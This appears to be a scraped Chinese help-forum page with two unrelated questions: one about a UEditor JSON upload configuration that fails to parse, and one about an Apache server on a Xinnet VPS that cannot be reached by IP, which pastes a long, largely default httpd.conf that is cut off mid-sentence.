"/ueditor/jsp/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制,单位B */ "scrawlUrlPrefix": "http://127.0.0.1:8080/mrbbs", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/ueditor/jsp/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/ueditor/jsp/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "http://127.0.0.1:8080/mrbbs", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制,单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/ueditor/jsp/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "http://127.0.0.1:8080/mrbbs", /* 视频访问路径前缀 */ "videoMaxSize": 102400000, /* 上传大小限制,单位B,默认100MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/ueditor/jsp/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "http://127.0.0.1:8080/mrbbs", /* 文件访问路径前缀 */ "fileMaxSize": 51200000, /* 上传大小限制,单位B,默认50MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/ueditor/jsp/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 20, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/ueditor/jsp/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "http://127.0.0.1:8080/mrbbs", /* 文件访问路径前缀 */ "fileManagerListSize": 20, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ } json文件搞不懂哪里出错了,怎么修改,望大神指点 解析后第2行解析错误: ...me": "uploadimage", /* 执行上传图片的action名称 * -----------------------^ 期望是 'STRING'
新网VPS没有绑定域名 不能通过ip访问?
新网vps, redhat, apache ssh没有问题,防火墙设置把所有的都关掉了(用setup命令操作的) **没有绑定域名,因为域名还没选好** netstat也查过了,两个端口都在 netstat -tulpn | grep :80 netstat -tulpn | grep :8080 ssh 后,使用下面这个命令可以得到index.html中的内容, GET http://我的ip/index.html GET http://我的ip:8080/index.html (启动的另一个apache instance,端口设置为8080) 但是浏览器中输入http://我的ip/index.html 就没有反应 请问Linux和apache配置方面还有什么要注意的? 是不是新网、ISP提供商禁止了ip方式访问?(因为我看到国内外论坛上都提到过服务商会吧IP问80端口禁止) 下面是httpd.conf # # This is the main Apache server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.2/> for detailed information. # In particular, see # <URL:http://httpd.apache.org/docs/2.2/mod/directives.html> # for a discussion of each configuration directive. # # # Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # The configuration directives are grouped into three basic sections: # 1. Directives that control the operation of the Apache server process as a # whole (the 'global environment'). # 2. Directives that define the parameters of the 'main' or 'default' server, # which responds to requests that aren't handled by a virtual host. # These directives also provide default values for the settings # of all virtual hosts. # 3. Settings for virtual hosts, which allow Web requests to be sent to # different IP addresses or hostnames and have them handled by the # same Apache server process. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so "logs/foo.log" # with ServerRoot set to "/etc/httpd" will be interpreted by the # server as "/etc/httpd/logs/foo.log". # ### Section 1: Global Environment # # The directives in this section affect the overall operation of Apache, # such as the number of concurrent requests it can handle or where it # can find its configuration files. # # # Don't give away too much information about all the subcomponents # we are running. Comment out this line if you don't mind remote sites # finding out what major optional modules you are running ServerTokens OS # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # NOTE! If you intend to place this on an NFS (or otherwise network) # mounted filesystem then please read the LockFile documentation # (available at <URL:http://httpd.apache.org/docs/2.2/mod/mpm_common.html#lockfile>); # you will save yourself a lot of trouble. # # Do NOT add a slash at the end of the directory path. # ServerRoot "/etc/httpd" # # PidFile: The file in which the server should record its process # identification number when it starts. # PidFile run/httpd.pid # # Timeout: The number of seconds before receives and sends time out. # Timeout 120 # # KeepAlive: Whether or not to allow persistent connections (more than # one request per connection). Set to "Off" to deactivate. # KeepAlive Off # # MaxKeepAliveRequests: The maximum number of requests to allow # during a persistent connection. Set to 0 to allow an unlimited amount. # We recommend you leave this number high, for maximum performance. # MaxKeepAliveRequests 100 # # KeepAliveTimeout: Number of seconds to wait for the next request from the # same client on the same connection. # KeepAliveTimeout 15 ## ## Server-Pool Size Regulation (MPM specific) ## # prefork MPM # StartServers: number of server processes to start # MinSpareServers: minimum number of server processes which are kept spare # MaxSpareServers: maximum number of server processes which are kept spare # ServerLimit: maximum value for MaxClients for the lifetime of the server # MaxClients: maximum number of server processes allowed to start # MaxRequestsPerChild: maximum number of requests a server process serves <IfModule prefork.c> StartServers 8 MinSpareServers 5 MaxSpareServers 20 ServerLimit 256 MaxClients 256 MaxRequestsPerChild 4000 </IfModule> # worker MPM # StartServers: initial number of server processes to start # MaxClients: maximum number of simultaneous client connections # MinSpareThreads: minimum number of worker threads which are kept spare # MaxSpareThreads: maximum number of worker threads which are kept spare # ThreadsPerChild: constant number of worker threads in each server process # MaxRequestsPerChild: maximum number of requests a server process serves <IfModule worker.c> StartServers 2 MaxClients 150 MinSpareThreads 25 MaxSpareThreads 75 ThreadsPerChild 25 MaxRequestsPerChild 0 </IfModule> # # Listen: Allows you to bind Apache to specific IP addresses and/or # ports, in addition to the default. See also the <VirtualHost> # directive. # # Change this to Listen on specific IP addresses as shown below to # prevent Apache from glomming onto all bound IP addresses (0.0.0.0) # #Listen 12.34.56.78:80 Listen 80 # # Dynamic Shared Object (DSO) Support # # To be able to use the functionality of a module which was built as a DSO you # have to place corresponding `LoadModule' lines at this location so the # directives contained in it are actually available _before_ they are used. # Statically compiled modules (those listed by `httpd -l') do not need # to be loaded here. # # Example: # LoadModule foo_module modules/mod_foo.so # LoadModule auth_basic_module modules/mod_auth_basic.so LoadModule auth_digest_module modules/mod_auth_digest.so LoadModule authn_file_module modules/mod_authn_file.so LoadModule authn_alias_module modules/mod_authn_alias.so LoadModule authn_anon_module modules/mod_authn_anon.so LoadModule authn_dbm_module modules/mod_authn_dbm.so LoadModule authn_default_module modules/mod_authn_default.so LoadModule authz_host_module modules/mod_authz_host.so LoadModule authz_user_module modules/mod_authz_user.so LoadModule authz_owner_module modules/mod_authz_owner.so LoadModule authz_groupfile_module modules/mod_authz_groupfile.so LoadModule authz_dbm_module modules/mod_authz_dbm.so LoadModule authz_default_module modules/mod_authz_default.so LoadModule ldap_module modules/mod_ldap.so LoadModule authnz_ldap_module modules/mod_authnz_ldap.so LoadModule include_module modules/mod_include.so LoadModule log_config_module modules/mod_log_config.so LoadModule logio_module modules/mod_logio.so LoadModule env_module modules/mod_env.so LoadModule ext_filter_module modules/mod_ext_filter.so LoadModule mime_magic_module modules/mod_mime_magic.so LoadModule expires_module modules/mod_expires.so LoadModule deflate_module modules/mod_deflate.so LoadModule headers_module modules/mod_headers.so LoadModule usertrack_module modules/mod_usertrack.so LoadModule setenvif_module modules/mod_setenvif.so LoadModule mime_module modules/mod_mime.so LoadModule dav_module modules/mod_dav.so LoadModule status_module modules/mod_status.so LoadModule autoindex_module modules/mod_autoindex.so LoadModule info_module modules/mod_info.so LoadModule dav_fs_module modules/mod_dav_fs.so LoadModule vhost_alias_module modules/mod_vhost_alias.so LoadModule negotiation_module modules/mod_negotiation.so LoadModule dir_module modules/mod_dir.so LoadModule actions_module modules/mod_actions.so LoadModule speling_module modules/mod_speling.so LoadModule userdir_module modules/mod_userdir.so LoadModule alias_module modules/mod_alias.so LoadModule rewrite_module modules/mod_rewrite.so LoadModule proxy_module modules/mod_proxy.so LoadModule proxy_balancer_module modules/mod_proxy_balancer.so LoadModule proxy_ftp_module modules/mod_proxy_ftp.so LoadModule proxy_http_module modules/mod_proxy_http.so LoadModule proxy_connect_module modules/mod_proxy_connect.so LoadModule cache_module modules/mod_cache.so LoadModule suexec_module modules/mod_suexec.so LoadModule disk_cache_module modules/mod_disk_cache.so LoadModule file_cache_module modules/mod_file_cache.so LoadModule mem_cache_module modules/mod_mem_cache.so LoadModule cgi_module modules/mod_cgi.so LoadModule version_module modules/mod_version.so # # The following modules are not loaded by default: # #LoadModule cern_meta_module modules/mod_cern_meta.so #LoadModule asis_module modules/mod_asis.so # # Load config files from the config directory "/etc/httpd/conf.d". # Include conf.d/*.conf # # ExtendedStatus controls whether Apache will generate "full" status # information (ExtendedStatus On) or just basic information (ExtendedStatus # Off) when the "server-status" handler is called. The default is Off. # #ExtendedStatus On # # If you wish httpd to run as a different user or group, you must run # httpd as root initially and it will switch. # # User/Group: The name (or #number) of the user/group to run httpd as. # . On SCO (ODT 3) use "User nouser" and "Group nogroup". # . On HPUX you may not be able to use shared memory as nobody, and the # suggested workaround is to create a user www and use that user. # NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET) # when the value of (unsigned)Group is above 60000; # don't use Group #-1 on these systems! # User apache Group apache ### Section 2: 'Main' server configuration # # The directives in this section set up the values used by the 'main' # server, which responds to any requests that aren't handled by a # <VirtualHost> definition. These values also provide defaults for # any <VirtualHost> containers you may define later in the file. # # All of these directives may appear inside <VirtualHost> containers, # in which case these default settings will be overridden for the # virtual host being defined. # # # ServerAdmin: Your address, where problems with the server should be # e-mailed. This address appears on some server-generated pages, such # as error documents. e.g. admin@your-domain.com # ServerAdmin root@localhost # # ServerName gives the name and port that the server uses to identify itself. # This can often be determined automatically, but we recommend you specify # it explicitly to prevent problems during startup. # # If this is not set to valid DNS name for your host, server-generated # redirections will not work. See also the UseCanonicalName directive. # # If your host doesn't have a registered DNS name, enter its IP address here. # You will have to access it by its address anyway, and this will make # redirections work in a sensible way. # #ServerName www.example.com:80 # eric add ServerName 我的ip!!!! # eric add end # # UseCanonicalName: Determines how Apache constructs self-referencing # URLs and the SERVER_NAME and SERVER_PORT variables. # When set "Off", Apache will use the Hostname and Port supplied # by the client. When set "On", Apache will use the value of the # ServerName directive. # UseCanonicalName Off # # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "/var/www/html" # # Each directory to which Apache has access can be configured with respect # to which services and features are allowed and/or disabled in that # directory (and its subdirectories). # # First, we configure the "default" to be a very restrictive set of # features. # <Directory /> Options FollowSymLinks AllowOverride None </Directory> # # Note that from this point forward you must specifically allow # particular features to be enabled - so if something's not working as # you might expect, make sure that you have specifically enabled it # below. # # # This should be changed to whatever you set DocumentRoot to. # <Directory "/var/www/html"> # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both complicated and important. Please see # http://httpd.apache.org/docs/2.2/mod/core.html#options # for more information. # Options Indexes FollowSymLinks # # AllowOverride controls what directives may be placed in .htaccess files. # It can be "All", "None", or any combination of the keywords: # Options FileInfo AuthConfig Limit # AllowOverride None # # Controls who can get stuff from this server. # Order allow,deny Allow from all #Deny from all </Directory> # # UserDir: The name of the directory that is appended onto a user's home # directory if a ~user request is received. # # The path to the end user account 'public_html' directory must be # accessible to the webserver userid. This usually means that ~userid # must have permissions of 711, ~userid/public_html must have permissions # of 755, and documents contained therein must be world-readable. # Otherwise, the client will only receive a "403 Forbidden" message. # # See also: http://httpd.apache.org/docs/misc/FAQ.html#forbidden # <IfModule mod_userdir.c> # # UserDir is disabled by default since it can confirm the presence # of a username on the system (depending on home directory # permissions). # UserDir disable # # To enable requests to /~user/ to serve the user's public_html # directory, remove the "UserDir disable" line above, and uncomment # the following line instead: # #UserDir public_html </IfModule> # # Control access to UserDir directories. The following is an example # for a site where these directories are restricted to read-only. # #<Directory /home/*/public_html> # AllowOverride FileInfo AuthConfig Limit # Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec # <Limit GET POST OPTIONS> # Order allow,deny # Allow from all # </Limit> # <LimitExcept GET POST OPTIONS> # Order deny,allow # Deny from all # </LimitExcept> #</Directory> # # DirectoryIndex: sets the file that Apache will serve if a directory # is requested. # # The index.html.var file (a type-map) is used to deliver content- # negotiated documents. The MultiViews Option can be used for the # same purpose, but it is much slower. # DirectoryIndex index.html index.html.var # # AccessFileName: The name of the file to look for in each directory # for additional configuration directives. See also the AllowOverride # directive. # AccessFileName .htaccess # # The following lines prevent .htaccess and .htpasswd files from being # viewed by Web clients. # <Files ~ "^\.ht"> Order allow,deny Deny from all </Files> # # TypesConfig describes where the mime.types file (or equivalent) is # to be found. # TypesConfig /etc/mime.types # # DefaultType is the default MIME type the server will use for a document # if it cannot otherwise determine one, such as from filename extensions. # If your server contains mostly text or HTML documents, "text/plain" is # a good value. If most of your content is binary, such as applications # or images, you may want to use "application/octet-stream" instead to # keep browsers from trying to display binary files as though they are # text. # DefaultType text/plain # # The mod_mime_magic module allows the server to use various hints from the # contents of the file itself to determine its type. The MIMEMagicFile # directive tells the module where the hint definitions are located. # <IfModule mod_mime_magic.c> # MIMEMagicFile /usr/share/magic.mime MIMEMagicFile conf/magic </IfModule> # # HostnameLookups: Log the names of clients or just their IP addresses # e.g., www.apache.org (on) or 204.62.129.132 (off). # The default is off because it'd be overall better for the net if people # had to knowingly turn this feature on, since enabling it means that # each client request will result in AT LEAST one lookup request to the # nameserver. # HostnameLookups Off # # EnableMMAP: Control whether memory-mapping is used to deliver # files (assuming that the underlying OS supports it). # The default is on; turn this off if you serve from NFS-mounted # filesystems. On some systems, turning it off (regardless of # filesystem) can improve performance; for details, please see # http://httpd.apache.org/docs/2.2/mod/core.html#enablemmap # #EnableMMAP off # # EnableSendfile: Control whether the sendfile kernel support is # used to deliver files (assuming that the OS supports it). # The default is on; turn this off if you serve from NFS-mounted # filesystems. Please see # http://httpd.apache.org/docs/2.2/mod/core.html#enablesendfile # #EnableSendfile off # # ErrorLog: The location of the error log file. # If you do not specify an ErrorLog directive within a <VirtualHost> # container, error messages relating to that virtual host will be # logged here. If you *do* define an error logfile for a <VirtualHost> # container, that host's errors will be logged there and not here. # ErrorLog logs/error_log # # LogLevel: Control the number of messages logged to the error_log. # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. # LogLevel warn # # The following directives define some format nicknames for use with # a CustomLog directive (see below). # LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" common LogFormat "%{Referer}i -> %U" referer LogFormat "%{User-agent}i" agent # "combinedio" includes actual counts of actual bytes received (%I) and sent (%O); this # requires the mod_logio module to be loaded. #LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio # # The location and format of the access logfile (Common Logfile Format). # If you do not define any access logfiles within a <VirtualHost> # container, they will be logged here. Contrariwise, if you *do* # define per-<VirtualHost> access logfiles, transactions will be # logged therein and *not* in this file. # #CustomLog logs/access_log common # # If you would like to have separate agent and referer logfiles, uncomment # the following directives. # #CustomLog logs/referer_log referer #CustomLog logs/agent_log agent # # For a single logfile with access, agent, and referer information # (Combined Logfile Format), use the following directive: # CustomLog logs/access_log combined # # Optionally add a line containing the server version and virtual host # name to server-generated pages (internal error documents, FTP directory # listings, mod_status and mod_info output etc., but not CGI generated # documents or custom error documents). # Set to "EMail" to also include a mailto: link to the ServerAdmin. # Set to one of: On | Off | EMail # ServerSignature On # # Aliases: Add here as many aliases as you need (with no limit). The format is # Alias fakename realname # # Note that if you include a trailing / on fakename then the server will # require it to be present in the URL. So "/icons" isn't aliased in this # example, only "/icons/". If the fakename is slash-terminated, then the # realname must also be slash terminated, and if the fakename omits the # trailing slash, the realname must also omit it. # # We include the /icons/ alias for FancyIndexed directory listings. If you # do not use FancyIndexing, you may comment this out. # Alias /icons/ "/var/www/icons/" <Directory "/var/www/icons"> Options Indexes MultiViews AllowOverride None Order allow,deny Allow from all </Directory> # # WebDAV module configuration section. # <IfModule mod_dav_fs.c> # Location of the WebDAV lock database. DAVLockDB /var/lib/dav/lockdb </IfModule> # # ScriptAlias: This controls which directories contain server scripts. # ScriptAliases are essentially the same as Aliases, except that # documents in the realname directory are treated as applications and # run by the server when requested rather than as documents sent to the client. # The same rules about trailing "/" apply to ScriptAlias directives as to # Alias. # ScriptAlias /cgi-bin/ "/var/www/cgi-bin/" # # "/var/www/cgi-bin" should be changed to whatever your ScriptAliased # CGI directory exists, if you have that configured. # <Directory "/var/www/cgi-bin"> AllowOverride None Options None Order allow,deny Allow from all </Directory> # # Redirect allows you to tell clients about documents which used to exist in # your server's namespace, but do not anymore. This allows you to tell the # clients where to look for the relocated document. # Example: # Redirect permanent /foo http://www.example.com/bar # # Directives controlling the display of server-generated directory listings. # # # IndexOptions: Controls the appearance of server-generated directory # listings. # IndexOptions FancyIndexing VersionSort NameWidth=* HTMLTable # # AddIcon* directives tell the server which icon to show for different # files or filename extensions. These are only displayed for # FancyIndexed directories. # AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip AddIconByType (TXT,/icons/text.gif) text/* AddIconByType (IMG,/icons/image2.gif) image/* AddIconByType (SND,/icons/sound2.gif) audio/* AddIconByType (VID,/icons/movie.gif) video/* AddIcon /icons/binary.gif .bin .exe AddIcon /icons/binhex.gif .hqx AddIcon /icons/tar.gif .tar AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip AddIcon /icons/a.gif .ps .ai .eps AddIcon /icons/layout.gif .html .shtml .htm .pdf AddIcon /icons/text.gif .txt AddIcon /icons/c.gif .c AddIcon /icons/p.gif .pl .py AddIcon /icons/f.gif .for AddIcon /icons/dvi.gif .dvi AddIcon /icons/uuencoded.gif .uu AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl AddIcon /icons/tex.gif .tex AddIcon /icons/bomb.gif core AddIcon /icons/back.gif .. AddIcon /icons/hand.right.gif README AddIcon /icons/folder.gif ^^DIRECTORY^^ AddIcon /icons/blank.gif ^^BLANKICON^^ # # DefaultIcon is which icon to show for files which do not have an icon # explicitly set. # DefaultIcon /icons/unknown.gif # # AddDescription allows you to place a short description after a file in # server-generated indexes. These are only displayed for FancyIndexed # directories. # Format: AddDescription "description" filename # #AddDescription "GZIP compressed document" .gz #AddDescription "tar archive" .tar #AddDescription "GZIP compressed tar archive" .tgz # # ReadmeName is the name of the README file the server will look for by # default, and append to directory listings. # # HeaderName is the name of a file which should be prepended to # directory indexes. ReadmeName README.html HeaderName HEADER.html # # IndexIgnore is a set of filenames which directory indexing should ignore # and not include in the listing. Shell-style wildcarding is permitted. # IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t # # DefaultLanguage and AddLanguage allows you to specify the language of # a document. You can then use content negotiation to give a browser a # file in a language the user can understand. # # Specify a default language. This means that all data # going out without a specific language tag (see below) will # be marked with this one. You probably do NOT want to set # this unless you are sure it is correct for all cases. # # * It is generally better to not mark a page as # * being a certain language than marking it with the wrong # * language! # # DefaultLanguage nl # # Note 1: The suffix does not have to be the same as the language # keyword --- those with documents in Polish (whose net-standard # language code is pl) may wish to use "AddLanguage pl .po" to # avoid the ambiguity with the common suffix for perl scripts. # # Note 2: The example entries below illustrate that in some cases # the two character 'Language' abbreviation is not identical to # the two character 'Country' code for its country, # E.g. 'Danmark/dk' versus 'Danish/da'. # # Note 3: In the case of 'ltz' we violate the RFC by using a three char # specifier. There is 'work in progress' to fix this and get # the reference data for rfc1766 cleaned up. # # Catalan (ca) - Croatian (hr) - Czech (cs) - Danish (da) - Dutch (nl) # English (en) - Esperanto (eo) - Estonian (et) - French (fr) - German (de) # Greek-Modern (el) - Hebrew (he) - Italian (it) - Japanese (ja) # Korean (ko) - Luxembourgeois* (ltz) - Norwegian Nynorsk (nn) # Norwegian (no) - Polish (pl) - Portugese (pt) # Brazilian Portuguese (pt-BR) - Russian (ru) - Swedish (sv) # Simplified Chinese (zh-CN) - Spanish (es) - Traditional Chinese (zh-TW) # AddLanguage ca .ca AddLanguage cs .cz .cs AddLanguage da .dk AddLanguage de .de AddLanguage el .el AddLanguage en .en AddLanguage eo .eo AddLanguage es .es AddLanguage et .et AddLanguage fr .fr AddLanguage he .he AddLanguage hr .hr AddLanguage it .it AddLanguage ja .ja AddLanguage ko .ko AddLanguage ltz .ltz AddLanguage nl .nl AddLanguage nn .nn AddLanguage no .no AddLanguage pl .po AddLanguage pt .pt AddLanguage pt-BR .pt-br AddLanguage ru .ru AddLanguage sv .sv AddLanguage zh-CN .zh-cn AddLanguage zh-TW .zh-tw # # LanguagePriority allows you to give precedence to some languages # in case of a tie during content negotiation. # # Just list the languages in decreasing order of preference. We have # more or less alphabetized them here. You probably want to change this. # LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW # # ForceLanguagePriority allows you to serve a result page rather than # MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE (Fallback) # [in case no accepted languages matched the available variants] # ForceLanguagePriority Prefer Fallback # # Specify a default charset for all content served; this enables # interpretation of all content as UTF-8 by default. To use the # default browser choice (ISO-8859-1), or to allow the META tags # in HTML content to override this choice, comment out this # directive: # AddDefaultCharset UTF-8 # # AddType allows you to add to or override the MIME configuration # file mime.types for specific file types. # #AddType application/x-tar .tgz # # AddEncoding allows you to have certain browsers uncompress # information on the fly. Note: Not all browsers support this. # Despite the name similarity, the following Add* directives have nothing # to do with the FancyIndexing customization directives above. # #AddEncoding x-compress .Z #AddEncoding x-gzip .gz .tgz # If the AddEncoding directives above are commented-out, then you # probably should define those extensions to indicate media types: # AddType application/x-compress .Z AddType application/x-gzip .gz .tgz # # AddHandler allows you to map certain file extensions to "handlers": # actions unrelated to filetype. These can be either built into the server # or added with the Action directive (see below) # # To use CGI scripts outside of ScriptAliased directories: # (You will also need to add "ExecCGI" to the "Options" directive.) # #AddHandler cgi-script .cgi # # For files that include their own HTTP headers: # #AddHandler send-as-is asis # # For type maps (negotiated resources): # (This is enabled by default to allow the Apache "It Worked" page # to be distributed in multiple languages.) # AddHandler type-map var # # Filters allow you to process content before it is sent to the client. # # To parse .shtml files for server-side includes (SSI): # (You will also need to add "Includes" to the "Options" directive.) # AddType text/html .shtml AddOutputFilter INCLUDES .shtml # # Action lets you define media types that will execute a script whenever # a matching file is called. This eliminates the need for repeated URL # pathnames for oft-used CGI file processors. # Format: Action media/type /cgi-script/location # Format: Action handler-name /cgi-script/location # # # Customizable error responses come in three flavors: # 1) plain text 2) local redirects 3) external redirects # # Some examples: #ErrorDocument 500 "The server made a boo boo." #ErrorDocument 404 /missing.html #ErrorDocument 404 "/cgi-bin/missing_handler.pl" #ErrorDocument 402 http://www.example.com/subscription_info.html # # # Putting this all together, we can internationalize error responses. # # We use Alias to redirect any /error/HTTP_<error>.html.var response to # our collection of by-error message multi-language collections. We use # includes to substitute the appropriate text. # # You can modify the messages' appearance without changing any of the # default HTTP_<error>.html.var files by adding the line: # # Alias /error/include/ "/your/include/path/" # # which allows you to create your own set of files by starting with the # /var/www/error/include/ files and # copying them to /your/include/path/, even on a per-VirtualHost basis. # Alias /error/ "/var/www/error/" <IfModule mod_negotiation.c> <IfModule mod_include.c> <Directory "/var/www/error"> AllowOverride None Options IncludesNoExec AddOutputFilter Includes html AddHandler type-map var Order allow,deny Allow from all LanguagePriority en es de fr ForceLanguagePriority Prefer Fallback </Directory> # ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var # ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var # ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var # ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var # ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var # ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var # ErrorDocument 410 /error/HTTP_GONE.html.var # ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var # ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var # ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var # ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var # ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var # ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var # ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var # ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var # ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var # ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var </IfModule> </IfModule> # # The following directives modify normal HTTP response behavior to # handle known problems with browser implementations. # BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 BrowserMatch "RealPlayer 4\.0" force-response-1.0 BrowserMatch "Java/1\.0" force-response-1.0 BrowserMatch "JDK/1\.0" force-response-1.0 # # The following directive disables redirects on non-GET requests for # a directory that does not include the trailing slash. This fixes a # problem with Microsoft WebFolders which does not appropriately handle # redirects for folders with DAV methods. # Same deal with Apple's DAV filesystem and Gnome VFS support for DAV. # BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully BrowserMatch "MS FrontPage" redirect-carefully BrowserMatch "^WebDrive" redirect-carefully BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully BrowserMatch "^gnome-vfs/1.0" redirect-carefully BrowserMatch "^XML Spy" redirect-carefully BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully # # Allow server status reports generated by mod_status, # with the URL of http://servername/server-status # Change the ".example.com" to match your domain to enable. # #<Location /server-status> # SetHandler server-status # Order deny,allow # Deny from all # Allow from .example.com #</Location> # # Allow remote server configuration reports, with the URL of # http://servername/server-info (requires that mod_info.c be loaded). # Change the ".example.com" to match your domain to enable. # #<Location /server-info> # SetHandler server-info # Order deny,allow # Deny from all # Allow from .example.com #</Location> # # Proxy Server directives. Uncomment the following lines to # enable the proxy server: # #<IfModule mod_proxy.c> #ProxyRequests On # #<Proxy *> # Order deny,allow # Deny from all # Allow from .example.com #</Proxy> # # Enable/disable the handling of HTTP/1.1 "Via:" headers. # ("Full" adds the server version; "Block" removes all outgoing Via: headers) # Set to one of: Off | On | Full | Block # #ProxyVia On # # To enable a cache of proxied content, uncomment the following lines. # See http://httpd.apache.org/docs/2.2/mod/mod_cache.html for more details. # #<IfModule mod_disk_cache.c> # CacheEnable disk / # CacheRoot "/var/cache/mod_proxy" #</IfModule> # #</IfModule> # End of proxy directives. ### Section 3: Virtual Hosts # # VirtualHost: If you want to maintain multiple domains/hostnames on your # machine you can setup VirtualHost containers for them. Most configurations # use only name-based virtual hosts so the server doesn't need to worry about # IP addresses. This is indicated by the asterisks in the directives below. # # Please see the documentation at # <URL:http://httpd.apache.org/docs/2.2/vhosts/> # for further details before you try to setup 